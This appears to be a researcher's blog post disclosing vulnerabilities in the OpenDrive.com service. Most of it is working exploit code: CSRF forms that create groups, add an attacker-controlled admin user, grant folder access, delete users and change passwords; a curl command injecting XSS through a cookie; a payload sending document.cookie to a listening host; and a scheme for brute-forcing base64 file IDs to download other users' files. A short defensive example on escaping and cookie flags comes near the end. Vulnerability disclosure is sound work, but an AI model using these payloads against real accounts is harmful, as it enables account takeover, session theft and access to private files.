Pwning OpenDrive Users

After a long time away from bug hunting, I came across these few bugs in the OpenDrive.com website.

If an attacker can get this code to run in the browser while the user is logged in, he can create his own groups in the user's Users section. This is the proof of concept; you will see groups such as “pwned” being created.

XSRF in Creating Groups

<html>
<!-- Discovered by @OsandaMalith-->
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://www.opendrive.com/ajax", true);
        xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
        xhr.withCredentials = true;
        var body = "action=create-usergroup&group_name=pwned&group_max_storage=5120&group_bw_max=1024";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Click Here to Pwn" onclick="submitRequest();" />
    </form>
  </body>
</html>

Complete Account Takeover XSRF

An attacker can completely take over the account of any user who runs the XSRF exploit in the browser while logged in.

Change the email in pwn.html to a new email account; once the victim executes this code, that email will receive full admin rights 🙂 Next, execute GetFolders.html to get full permissions to the victim's folders.

The attacker can host these exploits on his server and make users run them. Please use CSRF tokens to fix this.

File: pwn.html

<html>
<!-- Discovered by @OsandaMalith-->
  <body>
    <form name="0day" action="https://www.opendrive.com/ajax" method="POST">
      <input type="hidden" name="action" value="create-accessuser" />
      <input type="hidden" name="access_first_name" value="Eve" />
      <input type="hidden" name="access_last_name" value="Haxor" />
      <input type="hidden" name="access_password" value="pwned" />
      <input type="hidden" name="access_email" value="youremail@yopmail.com" />
      <input type="hidden" name="access_admin_mode" value="1" />
      <input type="hidden" name="access_notification" value="0" />
      <input type="hidden" name="access_max_storage" value="5120" />
      <input type="hidden" name="access_bw_max" value="1024" />
      <input type="hidden" name="group_id" value="110701" />
      <input type="hidden" name="access_phone" value="123" />
      <input type="hidden" name="access_password_change" value="1" />
      <input type="hidden" name="access_position" value="Tester" />
      <input type="hidden" name="access_send_password" value="1" />
      <input type="submit" value="Click Here to Pwn an account" />
    </form>
  </body>
</html>

Next we take control of all folders. You can clearly see that from the attacker's account we were able to access the “confidential.txt” file inside the victim's account.

File: GetFolders.html

<html>
<!-- Discovered by @OsandaMalith-->
  <body>
    <form name="0day" action="https://www.opendrive.com/ajax" method="POST">
      <input type="hidden" name="action" value="set-folder-access" />
      <input type="hidden" name="access_email" value="haxor15@yopmail.com" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU0X1ljcFAw]" value="1" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU1X1FKWFk4]" value="1" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU2X05DMHlB]" value="1" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU3X1NKc1Jl]" value="1" />
      <input type="submit" value="Click Here to Pwn the Folders" />
    </form>
  </body>
</html>

Here is a proof of concept video I made to demonstrate this.

Delete Account XSRF

Once a user adds another user to the users list, the delete option has no XSRF token, so an attacker can arbitrarily delete the added user by specifying the email.

<html>
  <body>
    <form action="https://www.opendrive.com/ajax" method="POST">
      <input type="hidden" name="action" value="user-delete" />
      <input type="hidden" name="access_email" value="youremail@yopmail.com" />
      <input type="submit" value="Click Here to Delete" />
    </form>
  </body>
</html>

Change Password

We can change the user's password with the following XSRF exploit.

<html>
  <!-- Discovered by @OsandaMalith -->
  <body>
    <form action="https://www.opendrive.com/settings/profile" method="POST">
      <input type="hidden" name="_wpnonce" value="24ce7b505d" />
      <input type="hidden" name="user_info_old_password" value="OldPassword" />
      <input type="hidden" name="user_info_new_password" value="NewPassword" />
      <input type="hidden" name="user_info_repeat_password" value="NewPassword" />
      <input type="hidden" name="form_action" value="update_password" />
      <input type="submit" value="Change Password" />
    </form>
  </body>
</html>

Cookie Based XSS

I found a Cookie based XSS vulnerability in the domain admin.opendrive.com.

GET /login HTTP/1.1
Host: admin.opendrive.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: login_value="><svg/onload="alert('XSS by Osanda')">;
Connection: keep

curl -i -s -k -X 'GET' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0' \
  -b 'login_value="><svg/onload="alert(1337)">' \
  'http://admin.opendrive.com/login' | grep 1337

We can steal the session cookies and gain access to other accounts: the cookies are marked neither HttpOnly nor Secure.

Here's a demonstration of stealing the session cookie 🙂

<svg/onload=document.location='http://localhost:8000/?'+document.cookie>
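
As an added example (not OpenDrive's code) of the failure mode behind this bug and of the cookie flags noted above: a hypothetical login renderer that reflects login_value unescaped, the escaped version beside it, and a Set-Cookie builder that sets HttpOnly, Secure and SameSite. The renderer, the input markup and the cookie names are assumptions.

```javascript
// Added example (not OpenDrive's code). Hypothetical login page that echoes
// the login_value cookie into an input, shown vulnerable and then fixed.

// Minimal Cookie header parser: 'a=1; b=2' -> { a: "1", b: "2" }.
function parseCookies(header) {
  const out = {};
  for (const part of (header || "").split(";")) {
    const i = part.indexOf("=");
    if (i > 0) out[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return out;
}

// Vulnerable: raw concatenation lets a quote in the cookie close the attribute.
function renderLoginVulnerable(cookieHeader) {
  const v = parseCookies(cookieHeader).login_value || "";
  return '<input name="login" value="' + v + '">';
}

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]));
}

// Fixed: the cookie value can no longer break out of the quoted attribute.
function renderLoginSafe(cookieHeader) {
  const v = parseCookies(cookieHeader).login_value || "";
  return '<input name="login" value="' + escapeHtml(v) + '">';
}

// Session cookie with the attributes that keep it away from script (HttpOnly),
// off plaintext HTTP (Secure) and off cross-site requests (SameSite).
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}
```

With HttpOnly set, the document.cookie read in the payload above returns nothing for the session cookie even if an injection is found elsewhere.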

Weak Encoding

I noticed that files can easily be brute-forced.

https://dev.opendrive.com/api/v1/download/file.json/OTZfMzA5NDU1Nl8=?inline=1

Base64-decoded, OTZfMzA5NDU1Nl8= is 96_3094556_

We can brute-force these values, encode them back to base64, and download random people's files.
